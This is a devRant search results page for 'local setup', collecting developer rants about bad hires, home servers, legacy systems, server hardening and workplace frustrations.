Join devRant
Do all the things like
++ or -- rants, post your own rants, comment on others' rants and build your customized dev avatar
Sign Up
Pipeless API
From the creators of devRant, Pipeless lets you power real-time personalized recommendations and activity feeds using a simple API
Learn More
Search - "local setup"
-
Was lead developer at a small startup, I was hiring and had a budget to add 3 new people to my team to develop a new product for the company.
Some context first and then the rant!
Candidate 1 - Amazing, a dev I worked with before who was under utilized at the previous company. Still a junior, but, she was a quick learner and eager to expand her knowledge, never an issue.
Candidate 2 - Kickass dev with back end skills and extras, he was always eager to work a bit more than what was expected. I use to send him home early to annoy him. haha!
Candidate 3 - Lets call him P.
In the interview he answers every question perfectly, he asks all the right questions and suggests some things I havent even thought of. CTO goes ahead and says we should skip the technical test and just hire the guy, his smart and knows what his talking about, I agree and we hire him. (We where a bit desperate at this stage as well.)
He comes in a week early to pick up his work laptop to get setup before he starts the next week, awesome! This guy is going to be an asset to the company, cant wait to have him join the team - The CTO at this stage is getting ready to leave the company and I will be taking over the division and need someone to take over lead position, he seems like the guys to do it.
The guys starts the next week, he comes in and the laptop we gave him is now a local server for testing and he will be working off his own laptop, no issue, we are small so needed a testing stack, but wasnt really needed since we had procedures in place for this already.
Here is where everything goes wrong!!! First day goes great... Next day he gets in early 6:30am (Nice! NO!), he absolutely smells, no stinks, of weed, not a light smell, the entire fucking office smells of weed! (I have no problem with weed, just dont make it my problem to deal with). I get called by boss and told to sort this out people are complaining! I drive to office and have a meeting with him, he says its all good he understands. (This was Friday).
Monday comes around - Get a call from Boss at 7:30am. Whole office smells like weed, please talk to P again, this cannot happen again. I drive to office again, and he again says it wont happen again, he has some issues with back pain and the weed helps.
Tuesday - Same fucking thing! And now he doesnt want to sign for the laptop("server") that was given to him, and has moved to code in the boardroom, WHERE OUR FUCKING CLIENTS WILL BE VIEWING A DEMO THAT DAY OF THE PRODUCT!! Now that whole room smells like weed, FML!
Wednesday - We send P a formal letter that he is under probation, P calls me to have a meeting. In the meeting he blames me for not understanding "new age" medicine, I ask for his doctors prescription and ask why he didnt tell me this in the interview so I could make arrangements, we dont care if you are stoned, just do good work and be considerate to your co-workers. P cant provide these and keeps ranting, I suggest he takes pain killers, he has none of it only "new age" medicine for him.
Thursday - I ask him to rather "work" from home till we can get this sorted, he comes in for code reviews for 2 weeks. I can clearly see he has no idea how the system works but is trying, I thought I will dive deeper and look at all of his code. Its a mess, nothing makes sense and 50% of it is hard coded (We are building a decentralized API for huge data sets so this makes no sense).
Friday - In code review I confront him about this, he has excuses for everything, I start asking him harder questions about the project and to explain what we are building - he goes quiet and quits on the spot with a shitty apology.
From what I could make out he was really smart when it came to theory but interpreting the theory to actual practice wasnt possible for him, probably would have been easier if he wasnt high all the time.
I hate interview code tests, but learned a valuable lesson that day! Always test for some code knowledge as well even if you hate doing it, ask the right questions and be careful who you hire! You can only bullshit for so long in coding before someone figures out that you are a fraud.16 -
Hacking/attack experiences...
I'm, for obvious reasons, only going to talk about the attacks I went through and the *legal* ones I did 😅 😜
Let's first get some things clear/funny facts:
I've been doing offensive security since I was 14-15. Defensive since the age of 16-17. I'm getting close to 23 now, for the record.
First system ever hacked (metasploit exploit): Windows XP.
(To be clear, at home through a pentesting environment, all legal)
Easiest system ever hacked: Windows XP yet again.
Time it took me to crack/hack into today's OS's (remote + local exploits, don't remember which ones I used by the way):
Windows: XP - five seconds (damn, those metasploit exploits are powerful)
Windows Vista: Few minutes.
Windows 7: Few minutes.
Windows 10: Few minutes.
OSX (in general): 1 Hour (finding a good exploit took some time, got to root level easily aftewards. No, I do not remember how/what exactly, it's years and years ago)
Linux (Ubuntu): A month approx. Ended up using a Java applet through Firefox when that was still a thing. Literally had to click it manually xD
Linux: (RHEL based systems): Still not exploited, SELinux is powerful, motherfucker.
Keep in mind that I had a great pentesting setup back then 😊. I don't have nor do that anymore since I love defensive security more nowadays and simply don't have the time anymore.
Dealing with attacks and getting hacked.
Keep in mind that I manage around 20 servers (including vps's and dedi's) so I get the usual amount of ssh brute force attacks (thanks for keeping me safe, CSF!) which is about 40-50K every hour. Those ip's automatically get blocked after three failed attempts within 5 minutes. No root login allowed + rsa key login with freaking strong passwords/passphrases.
linu.xxx/much-security.nl - All kinds of attacks, application attacks, brute force, DDoS sometimes but that is also mostly mitigated at provider level, to name a few. So, except for my own tests and a few ddos's on both those domains, nothing really threatening. (as in, nothing seems to have fucked anything up yet)
How did I discover that two of my servers were hacked through brute forcers while no brute force protection was in place yet? installed a barebones ubuntu server onto both. They only come with system-default applications. Tried installing Nginx next day, port 80 was already in use. I always run 'pidof apache2' to make sure it isn't running and thought I'd run that for fun while I knew I didn't install it and it didn't come with the distro. It was actually running. Checked the auth logs and saw succesful root logins - fuck me - reinstalled the servers and installed Fail2Ban. It bans any ip address which had three failed ssh logins within 5 minutes:
Enabled Fail2Ban -> checked iptables (iptables -L) literally two seconds later: 100+ banned ip addresses - holy fuck, no wonder I got hacked!
One other kind/type of attack I get regularly but if it doesn't get much worse, I'll deal with that :)
Dealing with different kinds of attacks:
Web app attacks: extensively testing everything for security vulns before releasing it into the open.
Network attacks: Nginx rate limiting/CSF rate limiting against SYN DDoS attacks for example.
System attacks: Anti brute force software (Fail2Ban or CSF), anti rootkit software, AppArmor or (which I prefer) SELinux which actually catches quite some web app attacks as well and REGULARLY UPDATING THE SERVERS/SOFTWARE.
So yah, hereby :P39 -
> installs devRant app on my iPhone
> too lazy to type my 18-char random password on mobile
> password manager app not on App Store yet
> dig up my old Macbook
> install XCode & homebrew package manager
> install 2 other package managers using homebrew
> install App deps from the 2 package managers
> query stackoverflow for why my deps fail to install
> open App in XCode
> setup Apple provisioning profile
> trust my certificate on my iPhone
> dig up an old router & setup a local WiFi network
> start a server on my laptop to serve my PGP keys
> download my PGP keys to my iPhone
> app crashes
> open an issue on github with steps to reproduce & stacktrace
...
> type my 18-char random password
> rant on how I wasted an entire afternoon13 -
So, continuing the story, in reverse order, on the warship and its domain setup...
One day, the CO told me that we needed to set up a proper "network". Until now, the "network" was just an old Telcom switch, and an online HDD. No DHCP, no nothing. The computers dropped to the default 169.254.0.0/16 link local block of addresses, the HDD was open to all, cute stuff. I do some research and present to him a few options. To start things off, and to show them that a proper setup is better and more functional, I set up a linux server on one old PC.
The CO is reluctant to approve of the money needed (as I have written before, budget constraints in the military is the stuff of nightmares, people there expect proper setups with two toothpicks and a rubber band). So, I employ the very principles I learned from the holy book Bastard Operator From Hell: terrorizing with intimidating-looking things. I show him the linux server, green letters over black font, ngrep -x running (it spooks many people to be shown that). After some techno-babble I got approval for a proper rack server and new PCs. Then came the hard part: convincing him to ditch the old Telcom switch in favour of a new CISCO Catalyst one.
Three hours of non-stop barrage. Long papers of NATO specifications on security standards. Subliminal threats on security compromises. God, I never knew I would have to stoop so low. How little did I know that after that...
Came the horrors of user support.
Moral of the story: an old greek saying says "even a saint needs terrorizing". Keep that in mind.4 -
TLDR;
Wrote a slick scheduling and communication system allowing me to assign photography resources based on time and location.
I'll tell you a little secret ... I'm not actually a dev. I'm a photographer, pretending to be a dev.
Or ... perhaps it's the other way around? (I spend most of my time writing code these days, but only for me - I write the software I use to run my business).
I own a photography studio - we specialize in youth volleyball photography (mostly 12-18 year old girls with a bit of high school, college and semi-pro thrown in for good measure - it's a hugely popular sport) and travel all over the US (and sometimes Europe) photographing.
As a point of scale, this year we photographed a tournament in Denver that featured 100 volleyball courts (in one room!), playing at the same time.
I'm based in California and fly a crew of part-time staff around to these events, but my father and I drive our booth equipment wherever it needs to go. We usually setup a 30'x90' booth with local servers, download/processing/cashier computers and 45 laptops for viewing/ordering photographs. Not to mention 16' drape and banners, tons of samples, 55' TVs, etc. It's quite the production.
We photograph by paid signup only - when there are upwards of 800 teams/9,600 athletes per weekend playing, and you only have four trained photographers, you've got to manage your resources!
This of course means you have to have a system for taking sign those sign ups, assigning teams to photographers and doing so in the most efficient manner possible based on who is available when the team is playing. (You can waste an awful lot of time walking from one court to another in a large convention center - especially if you have to navigate through large crowds - not to mention exhausting yourself).
So this year I finally added a feature I've wanted for quite some time - an interactive court map. I can take an image of the court layout from the tournament and create an HTML version in our software. As I mouse over requests in one window, the corresponding court is highlighted on the map in another browser window. Each photographer has a color associated with them. When I assign requests to a photographer, the court is color coded with the color of the photographer. This allows me to group assignments to minimize photographer walk time and keep them in a specific area. It's also very easy to look at the map and see unassigned requests and look to see what photographer is nearby.
This year I also integrated with Twilio and setup a simple set of text shortcuts that photographers can use to let our booth staff know where they are, if they have memory cards that need picking up, if they need water/coffee/snack, etc. They can also move assignments on their schedule or send and SOS for help if it looks like they aren't going to be able to photograph a team.
Kind of a CLI via the phone. :)
The additions have turned out to be really useful and has made scheduling and managing the photographers much easier that it was in the past.18 -
I decided to setup a little server on my local network just to make use of a 2TB harddrive I use to store videos.
Told everyone in the house I planned to grow the library over time and that they could access it all in a browser using my system name. It's become quite a fun venture and my video library is shaping up nicely.
Using nginx on a Dell XPS 17 with Ubuntu 16.04 to host a server that just auto indexes a shared directory on my external 2TB harddrive. Kind of an embarrassing rig, but it's just a hobby activity and I do plan to upgrade shit later.
The real fun has been getting to understand a bit more about video files. They used to be magic to me, as complex as their file extension. Now I run a script on all of my torrents which checks the video and audio codecs, converting them if they aren't supported by Chrome's and Firefox's web players, and outputting mp4s using ffmpeg. I feel like I have this stuff down fairly well now. Becoming more and more automated.
Next step is to port forward so I can access it from anywhere, but we'll see about that later down the line.22 -
So we hired an intern and his first task was to change a few things in email layout for our client, which is an investment bank.
I told to one of my developers to make his local database dump and setup the project for an intern. When intern completed the task, my developer thought that title "Dow Jones index crashed" was pretty funny title for a test.
What he didn't thought through enough, is that he forgot to configure fake SMTP server and he had production database dump with real email addresses.
I had really awkward 20 minutes conversation with our client. Fuck my life.4 -
Trying to setup a local Overpass API and Nominatim server (OpenStreetMaps data stuff).
The docker overpass image has been downloading a 38gb file for a little more than an hour now and it's coming closer and closer...
3..........
2............
1...............
100% YEAAAA.......
*docker continues to initiate the download of a new file*
"Hmm this can't be THAT bi......"
25gb
D:
Let's wait yet again..... I was so excited :(11 -
Suddenly it hits me.
It’s 01:20 here but i get it.
It’s ALL a budget thing.
No dedicated tester means less expenses.
No personal parkspot?
No expenses!
And no good staging or testing environment? Less expenses!
Meanwhile every developer can setup, work on, and maintain about 20 websites on their shitty local Windows machine, that doesn’t even have a proper SSD installed, and we are setting impossible deadlines to figure out who will sink and who will swim.
Ow, here is a SSD.. Figure out the installation yourself because we have no IT knowledge or budget for people that do.
You want a challenge? How about 40 other people that are distracting you all day long.
Meanwhile everybody has to improve their skills in js, react, html5, ccs3, angular, .net and razor so money can made faster.
It would be nice if you could build apps as well.
You had a question? Sorry, no time. Expect some feedback 14 days later.
You finished the site?
Great!
But here are 101 bugs to solve before next week.
All hail their crazy company!2 -
I've found and fixed any kind of "bad bug" I can think of over my career from allowing negative financial transfers to weird platform specific behaviour, here are a few of the more interesting ones that come to mind...
#1 - Most expensive lesson learned
Almost 10 years ago (while learning to code) I wrote a loyalty card system that ended up going national. Fast forward 2 years and by some miracle the system still worked and had services running on 500+ POS servers in large retail stores uploading thousands of transactions each second - due to this increased traffic to stay ahead of any trouble we decided to add a loadbalancer to our backend.
This was simply a matter of re-assigning the IP and would cause 10-15 minutes of downtime (for the first time ever), we made the switch and everything seemed perfect. Too perfect...
After 10 minutes every phone in the office started going beserk - calls where coming in about store servers irreparably crashing all over the country taking all the tills offline and forcing them to close doors midday. It was bad and we couldn't conceive how it could possibly be us or our software to blame.
Turns out we made the local service write any web service errors to a log file upon failure for debugging purposes before retrying - a perfectly sensible thing to do if I hadn't forgotten to check the size of or clear the log file. In about 15 minutes of downtime each stores error log proceeded to grow and consume every available byte of HD space before crashing windows.
#2 - Hardest to find
This was a true "Nessie" bug.. We had a single codebase powering a few hundred sites. Every now and then at some point the web server would spontaneously die and vommit a bunch of sql statements and sensitive data back to the user causing huge concern but I could never remotely replicate the behaviour - until 4 years later it happened to one of our support staff and I could pull out their network & session info.
Turns out years back when the server was first setup each domain was added as an individual "Site" on IIS but shared the same root directory and hence the same session path. It would have remained unnoticed if we had not grown but as our traffic increased ever so often 2 users of different sites would end up sharing a session id causing the server to promptly implode on itself.
#3 - Most elegant fix
Same bastard IIS server as #2. Codebase was the most unsecure unstable travesty I've ever worked with - sql injection vuns in EVERY URL, sql statements stored in COOKIES... this thing was irreparably fucked up but had to stay online until it could be replaced. Basically every other day it got hit by bots ended up sending bluepill spam or mining shitcoin and I would simply delete the instance and recreate it in a semi un-compromised state which was an acceptable solution for the business for uptime... until we we're DDOS'ed for 5 days straight.
My hands were tied and there was no way to mitigate it except for stopping individual sites as they came under attack and starting them after it subsided... (for some reason they seemed to be targeting by domain instead of ip). After 3 days of doing this manually I was given the go ahead to use any resources necessary to make it stop and especially since it was IIS6 I had no fucking clue where to start.
So I stuck to what I knew and deployed a $5 vm running an Nginx reverse proxy with heavy caching and rate limiting linked to a custom fail2ban plugin in in front of the insecure server. The attacks died instantly, the server sped up 10x and was never compromised by bots again (presumably since they got back a linux user agent). To this day I marvel at this miracle $5 fix.1 -
Thank you guys. Especially thank you @linuxxx. Because of your help, patience and advice I accomplished to setup and manage my new VPS on my own. I even moved to linux on my local machine.
It has been a long path. But I feel confident now. Thank you for growing that feeling in me.6 -
I showed a friend of mine a project I made in two days in Docker and Symfony php. It is a rather simple app, but it did involve my usual setup: Nginx with gzip/cache/security headers/ssl + redis caching db + php-fpm for symfony. I also used php7.4 for the lolz
He complained that he didn't like using Docker and would rather install dependencies with composer install and then run it with a Laravel command. He insisted that he wanted a non-docker installation manual.
I advised him to first install Nginx and generate some self-signed certificates, then copy all the config files and replace any environment-injected values (I use a self-made shell script for this) with the environment values in the docker-compose files.
Then I told him to download php-fpm with php 7.4 alpha, install and configure all the extensions needed, download and set up a local Redis database and at last re-implement a .env file since I removed those to replace them with a container environment.
He sent an angry emoji back (in a funny way)
God bless containerized applications, so easy to spin up entire applications (either custom or vendor like redis/mysql) and throw them away after having played with them. No need to clutter up your own pc with runtime environments.
I wonder if he relents :p9 -
Ok so this happend in the last 3 days, I didn't post it till now because I had to seriously take a rest with all the bullshit and stress that came with it...
(Legacy project I have the lead in called: "Foo")
Monday:
Management decided it would be effective to add a senior and a junior to Foo, which would make (together with me) to be 2 juniors and one senior developer
Well I've spend most of that day helping both the junior and the senior to setup "Foo" on their local development machines... So I could not do any programming myself
tuesday:
The senior wanted to refactor EVERYTHING... and I had to stop him multiple times because we simply do not have the time to do that...
The junior tried to work on other things as much as he could, and after he had run out of things to do, asked me for EVERYTHING... EVEN WHERE TO FUCKING CHANGE SOME GOD DAMN STRINGS!....
Also he did in total 3 commits, two of which existed of my code (because I had to "help" him
wednesday:
Both the junior and senior were removed from the project and I got another senior.. who fucking deleted the production database on accident
god damn rough few days man...7 -
A senior engineer with about 8 experience in my team and company for almost a year now. Believe it or not, still hasn't setup local dev environment.
Every time we ask this person to set it up / refer to guide in Confluence / or just use the docker image the person says ok.
Starts sending code for pull request. The code would not even compile in most cases just from a quick scan. When questioned how was this tested, answer would be more or less 'oh my local setup not working, could you test it out for me.'
Doesn't know how to write tests. Fairly recently instead of storing string values in a list, (I swear am not kidding) decided to come up with 20 string variables.
8 years plus experience! I think this is retarded even for a fresh grad.9 -
This one's for all the SysAdmins out there.
About 4 years ago I was asked to take over a dental offices systems administration (~20 machines) after their previous guy had allowed their servers RAID 1 to fail and hadn't done any updates or general maintenance. (please take note this office is my parents dental office).
I since have been recovering from his poor configuration and setup by instating an active directory environment and installing up to date software as well as updating machines on the domain to Windows 10 since windows 7 is no longer supported. I have also been properly licensing everything.
My bosses (my parents) are annoyed with this because "it's more expensive" and "it's too complicated we don't know how to manage it" and I don't know how to explain to them that they aren't fucking systems admins. They asked why they could do it before and I tried to explain that now it's secure and things need to be rolled out on the network level. They had every user running full local admin on every workstation plus the server.
Some people don't fucking understand that just because it's simple doesn't make it a good fucking idea. And because it's cheap doesn't mean it will always be (just wait till Microsoft audits you).
Oh and they also don't understand fucking CAL licensing and refuse to pay for gsuite for all their staff who use it. Instead they just have two gsuite accounts and give everyone the fucking password.
I'm going to have an aneurysm5 -
My current distraction is that I have found a local government surplus auction and I keep buying toys. This is my current distraction setup.9
-
Our company maneuvered themselves into a classic technical debt situation with a project of a second team of devs.
They then left, signing a maintenance contract and now barely work on the project for exorbitant amounts of money.
Of course management got the idea to hand off the project to the first team, i.e. our team, even though we are not experts in that field and not familiar with the tech stack.
So after some time they have asked for estimates on when we think we are able to implement new features for the project and whom we need to hire to do so. They estimates returned are in the magnitude of years, even with specialists and reality is currently hitting management hard.
Code is undocumented, there are several databases, several frontends and (sometimes) interfaces between these which are all heavily woven into one another. A build is impossible, because only the previous devs had a working setup on their machines, as over time packages were not updated and they just added local changes to keep going. A lot of shit does not conform to any practices, it's just, "ohh yeah, you have to go into that file and delete that line and then in that other file change that hardcoded credential". A core platform is end of life and can be broken completely by one of the many frameworks it uses. In short, all knowledge is stowed away in the head of those devs and the codebase is a technical-debt-ridden pile of garbage.
Frankly I am not even sure whom I am more mad at. Management has fucked up hard. They let people go until "they reached a critical mass" of crucial employees. Only they were at critical mass when they started making the jobs for team 2 unappealing and did not realize that - because how could they, they are not qualified to judge who is crucial.
However the dev team behaved also like shitbags. They managed the whole project for years now and they a) actively excluded other devs from their project even though it was required by management, b) left the codebase in a catastrophic state and mentioned, "well we were always stuffed with work, there was no time for maintenance and documentation".
Hey assholes. You were the managers on that project. Upper management has no qualification to understand technical debt. They kept asking for features and you kept saying yes and hastily slapped them into the codebase, instead of giving proper time estimates which account for code quality, tests, reviews and documentation.
In the end team #2 was treated badly, so I kinda get their side. But up until the management change, which is relatively recent, they had a fantastic management who absolutely had let them take the time to account for quality when delivering features - and yet the code base looks like a river of diarrhea.
Frankly, fuck those guys.
Our management and our PM remain great and the team is amazing. A couple of days a week we are now looking at this horrible mess of a codebase and try to decide of whom to hire in order to help make it any less broken. At least it seems management accepted this reality, because they now have hired personnel qualified to understand technical details and because we did a technical analysis to provide those details.
Let's see how this whole thing goes.1 -
Everyone was a noob once. I am the first to tell that to everyone. But there are limits.
Where I work we got new colleagues, fresh from college, claims to have extensive knowledge about Ansible and knows his way around a Linux system.... Or so he claims.
I desperately need some automation reinforcements since the project requires a lot of work to be done.
I have given a half day training on how to develop, starting from ssh keys setup and local machine, the project directory layout, the components the designs, the scripts, everything...
I ask "Do you understand this?"
"Yes, I understand. " Was the reply.
I give a very simple task really. Just adapt get_url tasks in such a way that it accepts headers, of any kind.
It's literally a one line job.
A week passes by, today is "deadline".
Nothing works, guy confuses roles with playbooks, sets secrets in roles hardcodes, does not create inventory files for specifications, no playbooks, does everything on the testing machine itself, abuses SSH Keys from the Controller node.... It's a fucking ga-mess.
Clearly he does not understand at all what he is doing.
Today he comes "sorry but I cannot finish it"
"Why not?" I ask.
"I get this error" sends a fucking screenshot. I see the fucking disaster setup in one shot ...
"You totally have not done the things like I taught you. Where are your commits and what are.your branch names?"
"Euuuh I don't have any"
Saywhatnow.jpeg
I get frustrated, but nonetheless I re-explain everything from too to bottom! I actually give him a working example of what he should do!
Me: "Do you understand now?"
Colleague: "Yes, I do understand now?"
Me: "Are you sure you understand now?"
C: "yes I do"
Proceeds to do fucking shit all...
WHY FUCKING LIE ABOUT THE THINGS YOU DONT UNDERSTAND??? WHAT KIND OF COGNITIVE MALFUNCTION IA HAPPENING IN YOUR HEAD THAT EVEN GIVEN A WORKING EXAMPLE YOU CANT REPLICATE???
WHY APPLY FOR A FUCKING JOB AND LIE ABOUT YOUR COMPETENCES WHEN YOU DO T EVEN GET THE FUCKING BASICS!?!?
WHY WASTE MY FUCKING TIME?!?!?!
Told my "dear team leader" (see previous rants) that it's not okay to lie about that, we desperately need capable people and he does not seem to be one of them.
"Sorry about that NeatNerdPrime but be patient, he is still a junior"
YOU FUCKING HIRED THAT PERSON WITH FULL KNOWLEDGE ABOUT HAI RESUME AND ACCEPTED HIS WORDS AT FACE VALUE WITHOUT EVEN A PROPER TECHNICAL TEST. YOU PROMISED HE WAS CAPABLE AND HE IS FUCKING NOT, FUCK YOU AND YOUR PEOPLE MANAGEMENT SKILLS, YOU ALREADY FAIL AT THE START.
FUCK THIS. I WILL SLACK OFF TODAY BECAUSE WITHOUT ME THIS TEAM AND THIS PROJECT JUST CRUMBLES DOWN DUE TO SHEER INCOMPETENCE.5 -
My last job before going freelance. It started as great startup, but as time passed and the company grew, it all went down the drain and turned into a pretty crappy culture.
Once one of the local "darling" startups, it's now widely known in the local community for low salaries and crazy employee churn.
Management sells this great "startup culture", but reality is wildly different. Not sure if the management believes in what the are selling, or if they know they are selling BS.
- The recurring motto of "Work smarter, not harder" is the biggest BS of them all. Recurring pressure to work unpaid overtime. Not overt, because that's illegal, but you face judgement if you don't comply, and you'll eventually see consequences like lack of raises, or being passed for promotions in favour of less competent people that are willing to comply.
- Expectation management is worse than non-existent. Worse, because they actually feed expectations they have no intention of delivering on. (I.e, career progression, salary bumps and so on)
- Management is (rightfully) proud of hiring talented people, but then treat almost everyone like they're stupid.
- Feedback is consistently ignored.
- Senior people leave. Replace them with cheap juniors. Promote the few juniors that stay for more than 12 months to middle-management positions and wonder where things went wrong.
- People who rock the boat about the bad culture or the shitty stunts that management occasionally pulls get pushed out.
- Get everyone working overtime for a week to setup a venue for a large event, abroad, while you have everyone in bunk rooms at the cheapest hostel you could find and you don't even cover all meal expenses. No staff hired to setup the venue, so this includes heavy lifting of all sorts. Fly them on the cheapest fares, ensuring nobody gets a direct flight and has a good few hours of layover. Fly them on the weekend, to make sure nobody is "wasting time" travelling during work hours. Then call this a team building.
This is a tech recruitment company that makes a big fuss about how tech recruitment is broken and toxic...
Also a company that wants to use ML and AI to match candidates to jobs and build a sophisticated product, and wanted a stronger "Engineering culture" not so long ago. Meanwhile:
- Engineering is shoved into the back seat. Major company and product decisions made without input from anyone on the engineering side of things, including the product roadmaps.
- Product lead is an inexperienced kid with zero tech background -> Promote him to also manage the developers as part of the product team while getting rid of your tech lead.
- Dev team is essentially seen by management as an assembly line for features. Dev salaries are now well below market average, and they wonder why it's hard to recruit good devs. (Again, this is a tech recruitment company)1 -
My friend argues working on remote desktop is better than working on a local setup! Where should i bang my head? ⚒️😭🙈9
-
"four million dollars"
TL;DR. Seriously, It's way too long.
That's all the management really cares about, apparently.
It all started when there were heated, war faced discussions with a major client this weekend (coonts, I tell ye) and it was decided that a stupid, out of context customisation POC had that was hacked together by the "customisation and delivery " (they know to do neither) team needed to be merged with the product (a hot, lumpy cluster fuck, made in a technology so old that even the great creators (namely Goo-fucking-gle) decided that it was their worst mistake ever and stopped supporting it (or even considering its existence at this point)).
Today morning, I my manager calls me and announces that I'm the lucky fuck who gets to do this shit.
Now being the defacto got admin to our team (after the last lead left, I was the only one with adequate experience), I suggested to my manager "boss, here's a light bulb. Why don't we just create a new branch for the fuckers and ask them to merge their shite with our shite and then all we'll have to do it build the mixed up shite to create an even smellier pile of shite and feed it to the customer".
"I agree with you mahaDev (when haven't you said that, coont), but the thing is <insert random manger talk here> so we're the ones who'll have to do it (again, when haven't you said that, coont)"
I said fine. Send me the details. He forwarded me a mail, which contained context not amounting to half a syllable of the word "context". I pinged the guy who developed the hack. He gave me nothing but a link to his code repo. I said give me details. He simply said "I've sent the repo details, what else do you require?"
1st motherfucker.
Dafuq? Dude, gimme some spice. Dafuq you done? Dafuq libraries you used? Dafuq APIs you used? Where Dafuq did you get this old ass checkout on which you've made these changes? AND DAFUQ IS THIS TOOL SUPPOSED TO DO AND HOW DOES IT AFFECT MY PRODUCT?
Anyway, since I didn't get a lot of info, I set about trying to just merge the code blindly and fix all conflicts, assuming that no new libraries/APIs have been used and the code is compatible with our master code base.
Enter delivery head. 2nd motherfucker.
This coont neither has technical knowledge nor the common sense to ask someone who knows his shit to help out with the technical stuff.
I find out that this was the half assed moron who agreed to a 3 day timeline (and our build takes around 13 hours to complete, end to end). Because fuck testing. They validated the their tool, we've tested our product. There's no way it can fail when we make a hybrid cocktail that will make the elephants foot look like a frikkin mojito!
Anywho, he comes by every half-mother fucking-hour and asks whether the build has been triggered.
Bitch. I have no clue what is going on and your people apparently don't have the time to give a fuck. How in the world do you expect me to finish this in 5 minutes?
Anyway, after I compile for the first time after merging, I see enough compilations to last a frikkin life time. I kid you not, I scrolled for a complete minute before reaching the last one.
Again, my assumption was that there are no library or dependency changes, neither did I know the fact that the dude implemented using completely different libraries altogether in some places.
Now I know it's my fault for not checking myself, but I was already having a bad day.
I then proceeded to have a little tantrum. In the middle of the floor, because I DIDN'T HAVE A CLUE WHAT CHANGES WERE MADE AND NOBODY CARED ENOUGH TO GIVE A FUCKING FUCK ABOUT THE DAMN FUCK.
Lo and behold, everyone's at my service now. I get all things clarified, takes around an hour and a half of my time (could have been done in 20 minutes had someone given me the complete info) to find out all I need to know and proceed to remove all compilation problems.
Hurrah. In my frustration, I forgot to push some changes, and because of some weird shit in our build framework, the build failed in Jenkins. Multiple times. Even though the exact same code was working on my local setup (cliche, I know).
In any case, it was sometime during sorting out this mess did I come to know that the reason why the 2nd motherfucker accepted the 3 day deadline was because the total bill being slapped to the customer is four fucking million USD.
Greed. Wow. The fucker just sacrificed everyone's day and night (his team and the next) for 4mil. And my manager and director agreed. Four fucking million dollars. I don't get to see a penny of it, I work for peanut shells, for 15 hours, you'll get bonuses and commissions, the fucking junior Dev earns more than me, but my manager says I'm the MVP of the team, all I get is a thanks and a bad rating for this hike cycle.
4mil usd, I learnt today, is enough to make you lick the smelly, hairy balls of a Neanderthal even though the money isn't truly yours.4 -
Two things before this all:
- I fucking love gitlab so far
- I miss the fuzzy searching from sublime text, as vsCode still can't do it properly..
I was fed up with all the shitty overbloated git deployment scripts, sync scripts, automatic backup solutions and hosted git servers out there, so now my own solution is:
- remote git cloned local files
- local files are synced via dropbox, to easily edit them on any device
- all changes and deleted files are saved up to 1 year on dropbox
- remote has gitlab running and webhooks setup
- the webhooks point to my node scripts, which then rebase the code to its dedicated dev server
- daily server backup with 7 days roll
- cold storage backup each 30 days
Sounds like overkill, but from my experience, you really can't have enough places that have a backup, especially coldstorage backups.
My goal in general though is to have everything on my computer backupped and ready to go asap, if something happens.
I wanted to just use a virtual machine for development stuff, but that wouldnt be able to run on my laptop, so I need a more general solution, where I sync all configs and all projects across. (and have some sort of basic list of tools needed, so I dont need to remember them)
Found for example something for vscode to sync its settings and plugins via any sort of git, will give it a try in near future too.7 -
My client's using some legacy server side software. I set it all up nice and isolated with proxmox, tunneled it through cloudflare, got the folks to do their install on a windows vm, passthrough their licensing usb. Hosted GLPI on it too (system inventory) and so on.
Wait for it. Windows Server refuses to accept local or domain passwords. WTF. Even went ahead and did a Utilman reset on it which lets you use an admin cmd prompt to the login screen where you could reset the password. Insane that it was even possible, but no good.
Client blamed linux for it, I switched over to Windows Server on baremetal. I setup Hyper-V thinking it should be just as capable as KVM.
Nope.
Guess what, you can't pass through usb for licensing (the legacy software). MOFOS DECIDED TO install it baremetal. I couldn't even get hyper-v to create a decent virtual network. It keeps changing all my network adapter settings. I COULDN'T EVEN PASSTHROUGH PCIE NETWORK CARDS.
This feels like an eternally stagnated, mossy soup of abandonware.
FUCK YOU WINDOWS. You've been sore pain the ass for EVERYONE.2 -
Got to know about OSMC/Kodi last week. Took out my Raspberry Pi. Setup OSMC over the weekend, did all the cable setup for 4 external hard drives and connected to TV via HDMI. After few configurations, I'm all setup. I'm astonished by all the features it provides. Fetching data from TMDb (I had actually created a javaFX app to do this for my local library just last month), remote control from Android as well Web Browser. Enabled UPnP and now I have my complete media center floating around my house network. It is one of the best open source project I have laid my eyes upon. Wish I could attach more pics.6
-
Best thing about doing Wifi setup/network maintenance for the local coffee shop for free? Putting my laptop's MAC address into the QOS table and guaranteeing myself bandwidth.5
-
Remember to always setup and test your production setup!
Seem like a local college forgot to do some QA 😂 -
Some Project Manager outsourced a redundant RADIUS setup with MySQL backend. We got 2 copies of a daloradius appliance running on Ubuntu 10.04. Once I saw this, I started to get a bit suspicious and requested to audit the system and database redundancy. With the system in production, and without getting back any documentation, I got into the VMs using the default root password. This was not even the worst part, as I found. One server was using a local MySQL instance, while the other was also using the first one's MySQL instance. When I reported this, I was told to comment clearly any changes to the configuration files, which resulted in commenting the word SHAME above each change.1
-
I technically joined just after this guy left(fired) but the stories are to good to tell!
The guy was clearly off but It wasn't his fault he had to of had aspergers
He would demand! To write with two pens in one hand he said it was faster and the only way he could write neatly... (Nope)
I don't think it was to weird but he would put on music and play death metal stuff full volume, because he couldn't hear anyone the team used to make paper planes and fire them at him when they wanted his attention.
Another thing he was into furry ... Stuff but was super open about it had. Wolf's and shit like that on his desk and always had a wolf shirt.
But he was fired, he wasn't great at his job.
I came in to help sort out the mess it was the government's setup for servers and nurses and doctors computers for the NHS over in england.
He effectively skull fucked the entire system.
He magically (I to do day can not understand how) did forced updates and installed to a newer version of Windows servers the problem being the programs wouldn't work on newer windows at the time.
Most were on XP at the time and they used windows servers back then.
Luckily not nation wide just in my local area but still thousands of computers affected.
The issue became this ... You see they had this program on their computers that let them get patient documents and update etc
He removed code or added code that made it update all the laptops and desktops to a new service pack which they didn't want... Then he upgraded the servers to a new windows version I don't remember the specifics
But the updates and new version of Windows made it so the laptops etc couldn't communicate with the servers.
... The next day he got fired and I was brought in for a few weeks to help sort out the mess.
But apparently he was a super interesting guy but with way to many quirks.
It costs the tax payers a fortune! Literally a few million to sort his mistake out people were working round the clock for two weeks straight.3 -
